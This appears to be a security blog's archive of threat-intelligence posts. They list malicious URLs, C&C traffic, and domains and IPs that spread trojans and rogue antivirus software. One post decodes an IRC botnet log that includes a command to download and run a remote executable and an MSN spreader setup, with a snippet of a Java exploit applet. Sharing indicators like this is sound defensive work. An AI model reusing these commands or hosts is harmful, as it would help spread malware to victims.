Tag Archives: Malicious Domains

Recent malicious URLs analyzed #3

Report containing malicious urls logged:

POST /kj97hk9878b8j9hb.php?ini=XXX HTTP/1.1
User-Agent: Mozilla/6.0 (Windows; wget 3.0)
Host: simplycomics. in
 
POST /logos/XXX/61e3a327d/logo.gif HTTP/1.1
User-Agent: Mozilla/6.0 (Windows; wget 3.0)
Host: greatwebdata. in
 
POST /werber/b10353d72/217.gif HTTP/1.1
User-Agent: Mozilla/6.0 (Windows; wget 3.0)
Host: droolbuy. in
 
POST /perce/XXX/21c383b7c/qwerce.gif HTTP/1.1
User-Agent: Mozilla/6.0 (Windows; wget 3.0)
Host: migented. in
 
POST /college_news/college_news/college_news/college_news/build.php HTTP/1.0
User-Agent: Mozilla/3.0 (compatible; Indy Library)
Host: www.cnscut. cn
 
GET /zeus/zeus/config.bin HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.206.200.242
 
GET /help.txt HTTP/1.1
User-Agent: Mozilla/3.0 (compatible; Indy Library)
Host: www.cnscut. cn
 
GET /images/Telegrama.exe HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 80.13.172.136
 
GET /gx/444.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: toxtb. info
 
GET /xztj/555.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rvvxe. info
 
GET /xztj1/888.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: qvnok. info
 
GET /gx2/333.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: ucfya. info
 
POST /zeus/zeus/server%5bphp%5d/gate.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.206.200.242
 
GET /1/210.exe HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.nxmtv. info
 
GET /v14/setup.php?act=fb_get HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: ddk100. com
 
GET /1015000813 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: susimumezez. com
 
GET /v14/setup.php?act=fb_start&id=XXX HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: ddk100. com
 
GET /1/210.exe HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: udjng. info
 
GET /v14/setup.php?act=fb_get HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: ddk100. com
 
GET /xztj/555.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rvvxe. info
 
POST /1wave.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: hawfruit. com
 
GET /2wave.php?Yfe6r8E2QkJI0l5aLw0nFAqjiyWNidTqKNSAKIduCPnN2WO7JO4xDtdtjJndzsJ2hg== HTTP/1.0
Referer: hxxp://tubefaster. com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: mattfoy. com
 
POST /1wave.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: hslibrary. com
 
GET /2wave.php?Yfe6r8M2QkJI0l5aLwkkExXuhTmDw4fxMdTKZ54jDfbUwHqhI/MuDdF/zZvXnLZr HTTP/1.0
Referer: hxxp://ad.adserverplus. com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: utling. com
 
POST /1wave.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: topsaj. com
 
GET /2wave.php?Yfe6r8U2QkJI0l5aLw0mEQKjiyWNidTqKNSAKIduCPnN2WO7JO4xDtdtjJndzsJ2hg== HTTP/1.0
Referer: http://trailersandvideos. com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: thevehic. com
 
GET /xztj1/888.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: qvnok. info
 
GET /in.cgi?groups HTTP/1.0
Referer: hxxp://sl.servednetworks. com/www/delivery/afr.php?zoneid=57&cb=INSERT_RANDOM_NUMBER_HERE
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: m28m. in
 
GET /2wave.php?Yfe6r8k2QkJI0l5aLQwvHBXuhTmDw4fxMdTKZ54jDfbUwHqhI/MuDdF/zZvXnLZr HTTP/1.0
Referer: hxxp://www.investopedia. com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: thevehic. com

URLVoid domain analysis:

http://www.urlvoid.com/scan/simplycomics.in
http://www.urlvoid.com/scan/greatwebdata.in
http://www.urlvoid.com/scan/droolbuy.in
http://www.urlvoid.com/scan/migented.in
http://www.urlvoid.com/scan/cnscut.cn
http://www.ipvoid.com/scan/91.206.200.242
http://www.ipvoid.com/scan/80.13.172.136
http://www.urlvoid.com/scan/toxtb.info
http://www.urlvoid.com/scan/rvvxe.info
http://www.urlvoid.com/scan/qvnok.info
http://www.urlvoid.com/scan/ucfya.info
http://www.urlvoid.com/scan/nxmtv.info
http://www.urlvoid.com/scan/ddk100.com
http://www.urlvoid.com/scan/susimumezez.com
http://www.urlvoid.com/scan/udjng.info
http://www.urlvoid.com/scan/hawfruit.com
http://www.urlvoid.com/scan/mattfoy.com
http://www.urlvoid.com/scan/hslibrary.com
http://www.urlvoid.com/scan/utling.com
http://www.urlvoid.com/scan/topsaj.com
http://www.urlvoid.com/scan/thevehic.com
http://www.urlvoid.com/scan/qvnok.info
http://www.urlvoid.com/scan/m28m.in
http://www.urlvoid.com/scan/thevehic.com

IRC Botnet Logs with MSN Spreader

We noticed the following details in a log file in our sandbox:

:m{IT|XXX}agaigyu!agaigyu@hostXXX.it JOIN :#ngr
:Apache2.0 332 m{IT|XXX}agaigyu #ngr :.j -c FRA,ESP,ITA #it .dl http://efirst-data. in/install.48208.exe .mod msn on .msn.int # .msn.set http://image4msn. com/
:Apache2.0 333 m{IT|XXX}agaigyu #ngr xxx 1301238177

These details are related to an IRC botnet and we can extract few commands:

1. Bots with country (-c) as FRA/ESP/ITA join channel “#it”:

.j -c FRA,ESP,ITA #it

2. Download and execute a remote file:

.dl http://efirst-data. in/install.48208.exe

3. Enable module MSN spreader:

.mod msn on

4. Initialize MSN spreader:

.msn.int

5. Set MSN spreader URL:

.msn.set http://image4msn. com/

Now the victim will send to all his MSN contacts the malicious URL:

http://image4msn. com/

This URL contains a java exploit, as we can see from here:

<body><applet code='mordor.saruman.class' archive='./games/plugins.jar'><param name='sko' value=[...]

Report 2011-03-28 14:19:39 (GMT 1)
File Name plugins-jar
File Size 9015 bytes
File Type Unknown file
MD5 Hash 7b0418be80084558cf34f6bdc2d5b112
SHA1 Hash 727d343bfd8f5bb970df10fed97eccb9562ac634
Detections: 0 / 9 (0 %)
Status CLEAN

This is an image of the malicious URL when visited:

Image

Unprotected folder reveals existence of other files (exploit kit):

Image

Network traffic:

GET / HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: image4msn. com
 
POST /objects/ocget.dll HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: activex.microsoft. com
 
GET /d.php?f=18&e=0 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: image4msn. com

An executable file (PE) is downloaded:

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 12:22:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Pragma: public
Expires: Mon, 28 Mar 2011 12:22:17 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="readme.exe"
Content-Transfer-Encoding: binary
Content-Length: 91280
Connection: close
Content-Type: application/x-msdownload

MZ

Recent malicious URLs analyzed #2

Report containing malicious urls logged:

POST /msql.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Host: www.adamplus. com
 
GET /coldman.bin HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.lostyear. ru
 
GET /czl/zlo.cl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: casualhopperois. com
 
POST /zumboo.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.lameedge. ru
 
GET /files/454483969/usb.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rapidshare. com
 
GET /files/454483969/usb.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rs851tl2.rapidshare. com
 
GET /exe/4910b18a623c549e2e1bc53f6cc0682a4579fbf6/setup.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: get.zdropp.co. cc
 
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: image4msn. com
 
GET /install.48208.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: efirst-data. in
 
POST /djcash.php?ini=XXX HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: talkwire. in
 
GET /download.php?token=4910b18a623c549e2e1bc53f6cc0682a4579fbf6 HTTP/1.0
User-Agent: NSIS_Inetc (Mozilla)
Host: 5630.zdropp.co. cc
 
POST /trackstats.php HTTP/1.0
User-Agent: NSIS_Inetc (Mozilla)
Host: 6199.zdropp.co. cc
 
POST /application.php HTTP/1.0
User-Agent: NSIS_Inetc (Mozilla)
Host: 6199.zdropp.co. cc
 
GET /download.php?bundle=1 HTTP/1.0
User-Agent: NSIS_Inetc (Mozilla)
Host: s6199.wdropp.co. cc
 
GET /list.php?c=XXX&v=2&t=0,2486841 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2900.2096; Windows NT 5.1.2600)
Host: justoldleft. ru
 
GET /tm/crypt.exe?t=0,6011011 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2900.2096; Windows NT 5.1.2600)
Host: www.derquda. com
 
GET /sn.php?c=XXX&t=0,8542902 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2900.2096; Windows NT 5.1.2600)
Host: justoldleft. ru

URLVoid domain analysis:

http://www.urlvoid.com/scan/justoldleft.ru
http://www.urlvoid.com/scan/derquda.com
http://www.urlvoid.com/scan/s6199.wdropp.co.cc
http://www.urlvoid.com/scan/wdropp.co.cc
http://www.urlvoid.com/scan/6199.zdropp.co.cc
http://www.urlvoid.com/scan/zdropp.co.cc
http://www.urlvoid.com/scan/5630.zdropp.co.cc
http://www.urlvoid.com/scan/talkwire.in
http://www.urlvoid.com/scan/efirst-data.in
http://www.urlvoid.com/scan/image4msn.com
http://www.urlvoid.com/scan/get.zdropp.co.cc
http://www.urlvoid.com/scan/rs851tl2.rapidshare.com
http://www.urlvoid.com/scan/lameedge.ru
http://www.urlvoid.com/scan/casualhopperois.com
http://www.urlvoid.com/scan/adamplus.com
http://www.urlvoid.com/scan/lostyear.ru

Recent malicious URLs analyzed

Report containing malicious urls logged:

GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: ac6211.91mt.com
 
GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: zc8278.91mt.com
 
GET /exe/key/key4_0322.exe HTTP/1.0
User-Agent: BF
Host: ac6211.91mt.com
 
GET /exe/key/key_0323.exe HTTP/1.0
User-Agent: BF
Host: zc8278.91mt.com
 
POST /piastro.php?ini=XXX HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: deltadataserve.in
 
GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: om4089.91mt.com
 
GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: cz5834.91mt.com
 
GET /exe/key/key_0323.exe HTTP/1.0
User-Agent: BF
Host: om4089.91mt.com
 
GET /exe/key/key_0323.exe HTTP/1.0
User-Agent: BF
Host: cz5834.91mt.com
 
GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: bq8378.91mt.com
 
GET /exe/key/key_0323.exe HTTP/1.0
User-Agent: BF
Host: bq8378.91mt.com
 
GET /zz7654/cfg.bin HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: yuyu98.com
 
GET /zlv.exe HTTP/1.0
User-Agent: Mozilla
Host: aaphonecard.com
 
GET /maya.exe HTTP/1.0
User-Agent: Mozilla
Host: aaphonecard.com
 
POST /zz7654/g765.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: yuyu98.com
 
GET /e.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: casinovergelijker.com
 
GET /wawxb/kllpcttkx.php?adv=adv477&id=XXX&c=XXX HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)ver71
Host: abcartel.com
 
GET /emikavigat.html HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)ver71
Host: xudezyj903.virtue.nu
 
GET /otasenaqynec.html HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)ver71
Host: opytibuxi.virtue.nu
 
GET / HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)ver71
Host: newpharmacyschools.ru
 
GET /exe/key/key_0323.exe HTTP/1.0
User-Agent: BF
Host: ql578.91mt.com
 
GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: jz9233.91mt.com
 
GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: jz9233.91mt.com
 
GET /exe/key/key_0323.exe HTTP/1.0
User-Agent: BF
Host: jz9233.91mt.com
 
GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: xx7314.91mt.com
 
GET /exe/key/key_0323.exe HTTP/1.0
User-Agent: BF
Host: xx7314.91mt.com
 
GET /files/453734526/nig.exe HTTP/1.0
User-Agent: Mozilla
Host: rapidshare.com
 
GET /dw/dm.php?id=XXX&ver=dm0&v=2011_03_05&er=S_wd_rd_wrd_rrd_we_re_wc_rc_W5.1- HTTP/1.0
User-Agent: Mozilla/4.0 (SP3 WINLD)
Host: comcmdrun.com
 
GET /fast-scan/ HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: jeqtzjte.co.cc
 
GET /install.34556.exe HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: thepackplace.in
 
GET /dl.php?i=15 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 2367.in
 
GET / HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: releaseantivirus.com

URLVoid domain analysis:

http://www.urlvoid.com/scan/comcmdrun.com
http://www.ipvoid.com/scan/222.88.205.195
http://www.urlvoid.com/scan/xx7314.91mt.com
http://www.urlvoid.com/scan/jz9233.91mt.com
http://www.urlvoid.com/scan/ql578.91mt.com
http://www.urlvoid.com/scan/newpharmacyschools.ru
http://www.urlvoid.com/scan/opytibuxi.virtue.nu
http://www.urlvoid.com/scan/xudezyj903.virtue.nu
http://www.urlvoid.com/scan/abcartel.com
http://www.urlvoid.com/scan/casinovergelijker.com
http://www.urlvoid.com/scan/yuyu98.com
http://www.urlvoid.com/scan/aaphonecard.com
http://www.urlvoid.com/scan/bq8378.91mt.com
http://www.urlvoid.com/scan/cz5834.91mt.com
http://www.urlvoid.com/scan/om4089.91mt.com
http://www.urlvoid.com/scan/om4089.91mt.com
http://www.urlvoid.com/scan/deltadataserve.in
http://www.urlvoid.com/scan/zc8278.91mt.com
http://www.urlvoid.com/scan/ac6211.91mt.com
http://www.urlvoid.com/scan/jeqtzjte.co.cc
http://www.urlvoid.com/scan/thepackplace.in
http://www.urlvoid.com/scan/2367.in
http://www.urlvoid.com/scan/releaseantivirus.com

Oficla Trojan spreads through keygens and software cracks

Here is a new list of dangerous domains logged by internal honeypots and submitted by users, used to spread trojans, rogue security software and other malicious threats, some domains have a low detection rate as of today:

Rogue Security Software:

www4.checkpc96.co.cc / 209.212.149.23
www4.checkpc97.co.cc / 209.212.149.23
www4.checkpc98.co.cc / 209.212.149.23
www4.checkpc95.co.cc / 209.212.149.23
www4.checkpc94.co.cc / 209.212.149.23
www4.checkpc93.co.cc / 209.212.149.23
www1.makeptotect79.co.cc / 94.228.220.117
www1.makeptotect78.co.cc / 94.228.220.117
www1.makeptotect77.co.cc / 94.228.220.117
www1.makeptotect76.co.cc / 94.228.220.117
www1.makeptotect75.co.cc / 94.228.220.117
www1.makeptotect74.co.cc / 74.3.166.117
www1.makeptotect73.co.cc / 74.3.166.117
www1.makeptotect72.co.cc / 74.3.166.117
www1.makeptotect71.co.cc / 74.3.166.117
www1.makeptotect70.co.cc / 74.3.166.117

Trojan Distribution (Oficla/Renos):

gourlz.net / 178.63.3.138
thestockfiles.com / 69.10.36.218
vo2ov.com / 95.211.10.178
cvaohn.org / 209.123.181.48
mechadairysystems.com / 208.87.240.230
longsoft.org / 64.21.53.43
kenborden.com / 209.123.181.48
hotworldmedia.com / 69.10.36.218

Infected Websites:

absfixer.com/catalog/images/news.php?page=keyword (200 OK)
cafetorredealba.com/images/news.php?page=keyword (200 OK)
demo.itlinkonline.com/tcartz2/images/news.php?page=keyword (200 OK)
meyal.com/images/news.php?page=keyword (200 OK)
delisuper.com/images/page.php?page=keyword (200 OK)
antoniasecrets.com/catalog/images/news.php?page=keyword (200 OK)
ap2.dataoz.com/catalog/images/page.php?page=keyword (200 OK)
shylittle.com/catalog/images/page.php?page=keyword (200 OK)
dtechsac.com/tienda/images/news.php?page=keyword (200 OK)
cafetorredealba.com/images/news.php?page=keyword (200 OK)
donegalanglingcentre.com/shop/images/page.php?page=keyword (200 OK)
gravure3d.fr/catalog/images/page.php?page=keyword (200 OK)
exerciseelite.com/images/news.php?page=keyword (200 OK)
econdbike.it/negozio/images/news.php?page=keyword (200 OK)
seobrand.net/private_label/images/news.php?page=keyword (200 OK)

The IP address 209.123.181.48 (AS8001 – NAC Net Access Corp) looks like to have hosted and to actually host a very high number of malicious domains that are mostly used to distribute trojans as keygen or cracks for popular commercial software:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
allmusic.com.ua
amorphia.com.ua
artsofboreal.com
botaime.com
c-charts.com
cflor.org
creaweblog.com
cvaohn.org
digitaldepotstore.net
dwrz.com.ua
gsis-bro.com
imvu.com.ua
ineverforget.com
job-hotel.com.ua
k-p.km.ua
kenborden.com
loweimages.com
mail.allmusic.com.ua
mail.amorphia.com.ua
mail.artsofboreal.com
mail.creaweblog.com
mail.cvaohn.org
mail.digitaldepotstore.net
mail.dwrz.com.ua
mail.gsis-bro.com
mail.imvu.com.ua
mail.ineverforget.com
mail.job-hotel.com.ua
mail.k-p.km.ua
mail.kenborden.com
mail.maple-shion.net
mail.newlife3o.com
mail.obama4.in.ua
mail.obogreva.net
mail.pekinform.com.ua
mail.pill-flag.com
mail.ranta-kone.com
mail.serce.com.ua
mail.setite.com
mail.snak.vn.ua
mail.techwave.com.ua
mail.toptvproduct.ru
mail.ukreunov.com.ua
mail.xocit.com
mail.yazv.net
nasharu.org
newenglandgroup.us
newlife3o.com
ns1.obama4.in.ua
ns1.snak.kiev.ua
obama4.in.ua
pekinform.com.ua
pill-flag.com
ranta-kone.com
serce.com.ua
snak.vn.ua
techwave.com.ua
toptvproduct.ru
ukreunov.com.ua
www.botaime.com
www.dwrz.com.ua
www.ineverforget.com
www.loweimages.com
www.nasharu.org
www.xwarezzz.com
xwarezzz.com
yazv.net

Whois details for 209.123.181.48:

NetRange: 209.123.0.0 – 209.123.255.255
CIDR: 209.123.0.0/16
OriginAS: AS8001
NetName: NAC-NETBLK02
NetHandle: NET-209-123-0-0-1
Parent: NET-209-0-0-0-0
NetType: Direct Allocation
NameServer: NS2.NAC.NET
NameServer: NS1.NAC.NET
Comment: Additional Information Available via whois.nac.net
RegDate: 1997-08-06
Updated: 2007-09-18
Ref: http://whois.arin.net/rest/net/NET-209-123-0-0-1

OrgName: Net Access Corporation
OrgId: NAC
Address: 9 Wing Drive
City: Cedar Knolls
StateProv: NJ
PostalCode: 07927
Country: US
RegDate:
Updated: 2008-01-16
Ref: http://whois.arin.net/rest/org/NAC

OrgAbuseHandle: ABUSE156-ARIN
OrgAbuseName: Abuse Department
OrgAbusePhone: +1-800-638-6336
OrgAbuseEmail: XXXXX@nac.net
OrgAbuseRef: http://whois.arin.net/rest/poc/ABUSE156-ARIN

Also the IP address 64.21.53.43 (AS8001 – NAC Net Access Corp) looks like to host malicious domains, in particular longsoft.org that is used to distribute trojans by promising keygens and craks for software:

Trojan spreading in action:

Image

Report 2010-08-19 15:09:47 (GMT 1)
File Name paragon.exe
File Size 135168 bytes
File Type Executable File (EXE)
MD5 Hash f1d62efaea0986dd6b8ef1eee470e8dc
SHA1 Hash 90f59e41ad56204390f58f34c61c4aea04538a31
Detections: 3 / 16 ( 19 %)
Status INFECTED

Trojan Activity:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /98ds7c98ds7c98ds7c98.php?ini=
Host: duidrive.net (64.20.63.58)		
 
POST /logos/XXX
Host: devtempest.com (91.188.60.233)
 
POST /98ds7c98ds7c98ds7c98.php?ini=
Host: duidrive.net (64.20.63.58)
 
POST /werber/34b520e6b47/217.gif HTTP/1.1
Host: mybubblebean.com (85.234.190.47)
 
POST /perce/XXX
Host: peribox.net (77.78.239.42)

64.21.53.43 (AS8001 – NAC Net Access Corp)

1
2
3
4
5
6
7
longsoft.org
mail.longsoft.org
mail.real-downloads.net
mail.thenewamsterdams.net
mail.web-zik.com
real-downloads.net
web-zik.com

69.10.36.218 (AS19318 – NJIIX.net 110B Meadowlands Pkwy Secaucus)

1
2
3
4
5
6
mediaidentifier.com
movieregion.com
multimedianame.com
ns1.prominentupstairs.com
realplayerpro.com
yourreload.com

178.63.3.138 (AS24940 – Hetzner Online AG RZ)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
gourlz.net
aevitasecuritystore.com
atzan.com
buydedicated.ru
buyvps.ru
ddiscompstore.com
de2.reserver.ru
erosik.com
fasturls.net
finmill.com
funnyseo.biz
hentaix.ru
humorarchive.info
jaguarconsultant.com
keygen-crack.net
kino2012.ru
kinovam.com
mail.all4-sex.info
marconmedia.com
ns1.buydedicated.ru
photo63.www.vk.com.www2in.net
serialpost.net
sey.su
softwareserialnumbers.net
soshinenie.ru
trusted-warez.com
vadoz.ru
www.erosik.com
www.photo63.www.vk.com.www2in.net
www.soshinenie.ru
www.xmancer.org
www2in.net
xmancer.org

208.87.240.230 (AS40676 – Proxy registration for downstream)

1
2
3
4
5
6
7
8
9
10
11
12
13
bigbizoo.net
grosskopf.net
grrrey.com
mail.konseed.org
mail.richfootball.net
ns1.richfootball.net
ns2.richfootball.net
pixelfish.net
richfootball.net
setite.com
theapps.org
www.setite.com
xocit.com

217.23.5.74 (AS49981 – WorldStream)

1
2
3
4
billgable.com
dlov.org
softwareshare.org
techrev.net

8.14.147.235 (AS26481 – BONDWEB Bondweb)

1
2
3
4
5
6
7
8
9
10
11
12
13
directdownloads.ws
loaded.ws
mail.directdownloads.ws
mail.loaded.ws
mail.skinnyrons.com
mail.unlimitedserials.com
skinnyrons.com
unlimitedserials.com
warez411.com
loaded.ws
unlimitedserials.com
warez411.com
unlimitedserials.com

69.55.50.102 (AS23393 – ISPRIME , Inc.)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
downloadwarez.org
filereleases.com
fulldownload.ws
fullrapidshare.com
fullreleases.ws
fullversions.org
kevin.internal.realitychecknetwork.com
mail.fulldownload.ws
rcn560.realitychecknetwork.com
sharingaccess.com
downloadwarez.org
filereleases.com
fulldownload.ws
fullrapidshare.com
fullreleases.ws
fullversions.org
sharingaccess.com
sharingnova.com

We will stop here for now, but list is very long!